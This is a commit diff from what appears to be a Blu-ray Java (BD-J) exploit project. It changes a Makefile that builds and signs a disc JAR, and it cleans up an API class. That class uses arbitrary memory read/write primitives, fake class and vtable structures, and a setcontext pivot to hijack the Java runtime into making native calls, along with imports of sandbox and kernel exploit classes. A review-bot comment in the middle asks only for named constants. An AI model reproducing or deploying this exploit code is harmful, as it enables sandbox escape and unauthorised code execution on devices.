Clean up.
parent
9dcf0bfe7f
commit
8d7ad41156
4
Makefile
4
Makefile
@ -28,7 +28,7 @@ CLASSES = \
|
||||
|
||||
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
|
||||
|
||||
all: directory serialized classes jar bdmv
|
||||
all: directory serialized classes jar bdjo_bdmv
|
||||
|
||||
directory:
|
||||
mkdir -p $(BUILD)
|
||||
@ -47,7 +47,7 @@ jar:
|
||||
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
|
||||
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
|
||||
|
||||
bdmv:
|
||||
bdjo_bdmv:
|
||||
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
|
||||
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
|
||||
java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv
|
||||
|
@ -81,6 +81,10 @@ public final class API {
|
||||
|
||||
private native long multiNewArray(long componentType, int[] dimensions);
|
||||
|
||||
public boolean isJdk11() {
|
||||
return jdk11;
|
||||
}
|
||||
|
||||
private void init() throws Exception {
|
||||
initUnsafe();
|
||||
initDlsym();
|
||||
@ -112,6 +116,7 @@ public final class API {
|
||||
}
|
||||
|
||||
handleField = nativeLibraryClass.getDeclaredField(HANDLE_FIELD_NAME);
|
||||
|
||||
findMethod.setAccessible(true);
|
||||
handleField.setAccessible(true);
|
||||
|
||||
@ -174,6 +179,7 @@ public final class API {
|
||||
long apiInstance = addrof(this);
|
||||
long apiKlass = read64(apiInstance + 0x08);
|
||||
|
||||
boolean installed = false;
|
||||
if (jdk11) {
|
||||
long methods = read64(apiKlass + 0x170);
|
||||
int numMethods = read32(methods + 0x00);
|
||||
@ -194,7 +200,8 @@ public final class API {
|
||||
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
|
||||
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
|
||||
write64(method + 0x50, Java_java_lang_reflect_Array_multiNewArray);
|
||||
return;
|
||||
installed = true;
|
||||
break;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
@ -217,14 +224,26 @@ public final class API {
|
||||
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
|
||||
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
|
||||
write64(method + 0x78, Java_java_lang_reflect_Array_multiNewArray);
|
||||
return;
|
||||
installed = true;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (!installed) {
|
||||
throw new IllegalStateException("Could not install native method.");
|
||||
}
|
||||
|
||||
// Invoke call method many times to kick in optimization.
|
||||
train();
|
||||
}
|
||||
|
||||
private void train() {
|
||||
for (int i = 0; i < 10000; i++) {
|
||||
call(0);
|
||||
}
|
||||
}
|
||||
|
||||
private void buildContext(
|
||||
long contextBuf,
|
||||
long jmpBuf,
|
||||
@ -262,12 +281,6 @@ public final class API {
|
||||
write64(contextBuf + 0x118, 0);
|
||||
}
|
||||
|
||||
public void train() {
|
||||
for (int i = 0; i < 10000; i++) {
|
||||
call(0);
|
||||
}
|
||||
}
|
||||
|
||||
public long call(long func, long arg0, long arg1, long arg2, long arg3, long arg4, long arg5) {
|
||||
long fakeClassOop = malloc(INT64_SIZE);
|
||||
long fakeClass = malloc(0x100);
|
||||
@ -278,11 +291,6 @@ public final class API {
|
||||
throw new IllegalStateException("Could not allocate memory.");
|
||||
}
|
||||
|
||||
write64(fakeClassOop, 0);
|
||||
memset(fakeClass, 0, 0x100);
|
||||
memset(fakeKlass, 0, 0x200);
|
||||
memset(fakeKlassVtable, 0, 0x400);
|
||||
|
||||
try {
|
||||
long ret = 0;
|
||||
|
||||
@ -306,11 +314,14 @@ public final class API {
|
||||
} else {
|
||||
write64(fakeKlassVtable + 0x158, __Ux86_64_setcontext); // multi_allocate
|
||||
}
|
||||
|
||||
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
|
||||
|
||||
if (i == 0) {
|
||||
buildContext(
|
||||
fakeKlass + 0x00, fakeKlass + 0x00, func, arg0, arg1, arg2, arg3, arg4, arg5);
|
||||
}
|
||||
}
|
||||
} else {
|
||||
write64(fakeClassOop + 0x00, fakeClass);
|
||||
write64(fakeClass + 0x68, fakeKlass);
|
||||
@ -326,12 +337,15 @@ public final class API {
|
||||
} else {
|
||||
write64(fakeKlassVtable + 0x230, __Ux86_64_setcontext); // multi_allocate
|
||||
}
|
||||
|
||||
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
|
||||
|
||||
if (i == 0) {
|
||||
buildContext(
|
||||
fakeKlass + 0x20, fakeKlass + 0x20, func, arg0, arg1, arg2, arg3, arg4, arg5);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (ret == 0) {
|
||||
return 0;
|
||||
|
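Review bot: The structure offsets used by the install routine in the `-174`, `-194` and `-217` hunks are still bare literals (`apiKlass + 0x170` and `method + 0x50` in the `jdk11` branch, `method + 0x78` in the other), and nothing visible records which runtime layout each one was taken from. The new `installed = true; break;` pair had to be added twice because both branches repeat the same name/signature match, so one shared lookup loop would keep the two paths from drifting. A named constant per layout would also help, for example `JDK11_METHOD_PATCH_OFFSET` (a suggested name), with a one-line comment on its origin. The same applies to the `10000` in the now-private `train()`, whose only explanation is the comment at the call site. The enclosing method starts before the first of these hunks, so the non-JDK 11 counterpart of `0x170` is not visible here.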
@ -7,11 +7,11 @@
|
||||
|
||||
package com.bdjb;
|
||||
|
||||
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
|
||||
import com.bdjb.exploit.kernel.ExploitKernelInterface;
|
||||
import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
|
||||
import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
|
||||
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
|
||||
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
|
||||
import com.bdjb.exploit.kernel.ExploitKernelInterface;
|
||||
import java.io.FileOutputStream;
|
||||
import java.io.InputStream;
|
||||
import java.io.OutputStream;
|
||||
|